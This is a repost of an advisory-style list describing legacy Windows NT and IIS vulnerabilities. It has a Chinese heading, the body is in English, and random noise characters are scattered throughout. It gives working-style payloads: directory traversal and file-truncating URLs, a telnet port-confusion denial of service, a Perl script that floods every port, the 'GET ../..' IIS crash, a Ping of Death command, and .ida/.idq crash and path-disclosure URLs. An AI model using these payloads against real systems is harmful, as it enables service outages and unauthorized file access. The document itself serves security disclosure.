NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
. j/ C8 D) U- j8 j3 Z% \, a
/ m: _" A) ?0 \/ V- JA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

" l' k6 h+ b. E0 Q; uBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
# p- G4 ^" ~* _
& o( y: e* R1 {4 N2 a受影響系統(tǒng):4.0
4 g/ V: u' D( I2 W7 M0 eA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
& ~8 p# q. f, C
/ r( l  p1 B+ K( h+ F' ~' YIf the file 'target.bat' exists, the file will be truncated.
# C* u* u# K5 h1 W3 }, s  C5 {, b

. O% L  K; c4 w) O) L% N7 F' w2 f' s" n. ]A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

/ _! x0 C3 z9 @6 G1 q6 W5 C----------------------------------------------------------------------

: Z2 e" h- X' h: [受影響系統(tǒng):3.51,4.0
4 |% E! C7 H3 U5 |$ dMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
# _3 F0 A/ ~6 T5 Y, H) h" K/ {
The following steps;

3 f; T) x& ]) [; Q6 l% j6 M4 sTelnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
9 n# T- S9 D, [% Kresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
6 o) _1 A, D9 x  v& M- P  h
8 H4 E9 G) p' B, o" s& s4 iWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

6 K8 L/ p, ~' C2 H" VThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

" ^; O' K4 R$ JThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

& v) S7 H1 d7 M( ~, [/*begin poke code*/
' W9 b% d3 c. q
use Socket;
use FileHandle;
require "chat2.pl";
: a8 z5 m, t2 N' N* U: a2 v. \
; k0 K- J: U- a0 O% \& t# h$systemname = $ARGV[0] && shift;

( x  I& A* b& M$verbose = 1; # tell me what you're hitting
" T# h+ A$ v3 y9 z8 R3 A$ u; O$knownports = 1; # don't hit known problem ports
! I2 B8 e0 h5 y* I0 {0 z) Ffor ($port = $0; $port<65535; $port++)
; {1 Q" G- q$ z% d{
) R& t1 E; L3 P4 i0 b$ E, f

! q# t# c1 p+ ~2 D9 i1 _. cif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
}
$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
+ j: A; {) e& |; Jif ($verbose) {
print "Trying port: $port\n";
}
chat::close($fh);

, }. M2 d+ X2 A0 ~' A; H( W}

/ L. t, x% B: h/ Q9 F- ~
* K6 i8 o4 p) q! w: P- E$ c4 H/*end poke code*/
  ^) L/ _% y( c; C/ u$ z9 q* B
( p4 w# E* v7 N2 K8 \Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

  W8 g' D: ^* s" W  Q--------------------------------------------------------------------------------
. m! X. W7 Z6 q1 U. d
. Z( O, E+ a" l( s: y' |/ }受影響系統(tǒng):4.0
1 L0 Y2 v6 l) H5 o& |6 ^" oUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

. I3 s( `* {, D$ B8 F5 Q. _This attack causes Dr. Watson to display an alert window and to log an error:

: F' m/ P" y: t7 U: q5 H- `"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
- k3 t  f0 R: i
--------------------------------------------------------------------------------
+ ^2 [; Z$ z8 e9 G6 u5 P% a
受影響系統(tǒng):3.51,4.0
/ q+ H. t. v, WLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-
- V8 W+ B4 v( E7 w. D8 R
( R5 s5 W1 q; ^STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
9 b; j8 {, W3 b
" k2 Z1 p, Z4 C) U4 s0 S% dNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
5 e1 `: k9 t/ N1 U3 _1 `
--------------------------------------------------------------------------------
& R2 y+ ^" K" {$ r& r8 G9 c# z
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
. M# [7 m5 C* P: W$ Z" m: l% p3 E9 `
. o3 H+ B5 Q3 i9 e( ^* C--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server